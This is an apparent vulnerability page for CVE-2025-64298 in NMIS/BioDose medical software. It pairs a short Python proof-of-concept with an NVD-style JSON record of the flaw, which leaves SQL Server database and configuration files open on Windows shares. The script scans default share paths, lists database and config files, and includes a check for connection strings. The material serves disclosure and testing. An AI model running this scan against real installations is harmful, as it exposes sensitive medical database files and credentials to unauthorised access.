CVE-2025-64298

#!/usr/bin/env python3 """ CVE-2025-64298 PoC - NMIS/BioDose SQL Server Database Access Note: This is for authorized security testing only """ import os import sys import subprocess def check_nmis_installation(): """Check for default NMIS/BioDose installation paths""" default_paths = [ r"\\\\localhost\\C$\\Program Files\\NMIS\\BioDose\\Database", r"\\\\localhost\\C$\\Program Files (x86)\\NMIS\\BioDose\\Database", r"\\\\server\\share\\NMIS\\Database", r"\\\\server\\share\\BioDose\\Database" ] print("[*] Scanning for NMIS/BioDose database paths...") for path in default_paths: try: if os.path.exists(path): print(f"[+] Found accessible path: {path}") list_database_files(path) except Exception as e: print(f"[-] Error accessing {path}: {e}") def list_database_files(path): """List potential SQL Server database and config files""" extensions = ['.mdf', '.ldf', '.config', '.xml', '.ini'] print(f"\n[*] Enumerating files in {path}...") for root, dirs, files in os.walk(path): for file in files: if any(file.lower().endswith(ext) for ext in extensions): full_path = os.path.join(root, file) size = os.path.getsize(full_path) print(f" [FILE] {full_path} ({size} bytes)") def extract_connection_strings(config_path): """Extract potential connection strings from config files""" print(f"\n[*] Analyzing config file: {config_path}") try: with open(config_path, 'r', encoding='utf-8', errors='ignore') as f: content = f.read() # Look for connection strings and sensitive data if 'connectionString' in content.lower(): print("[+] Potential connection strings found!") except Exception as e: print(f"[-] Error reading {config_path}: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-64298 PoC - NMIS/BioDose Insecure Path Access") print("=" * 60) check_nmis_installation() print("\n[*] Scan complete.")

{"cve": {"id": "CVE-2025-64298", "sourceIdentifier": "[email protected]", "published": "2025-12-02T21:15:52.333", "lastModified": "2026-01-02T21:02:47.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "NMIS/BioDose V22.02 and previous version installations where the embedded Microsoft SQLServer Express is used are exposed in the Windows share accessed by clients in networked installs. By default, this directory has insecure directory paths that allow access to the SQL Server database and configuration files, which can contain sensitive data."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-732"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mirion:biodose\\/nmis:*:*:*:*:*:*:*:*", "versionEndExcluding": "23.0", "matchCriteriaId": "0C792586-2A7A-4497-B711-F56F88E84E34"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-336-01", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}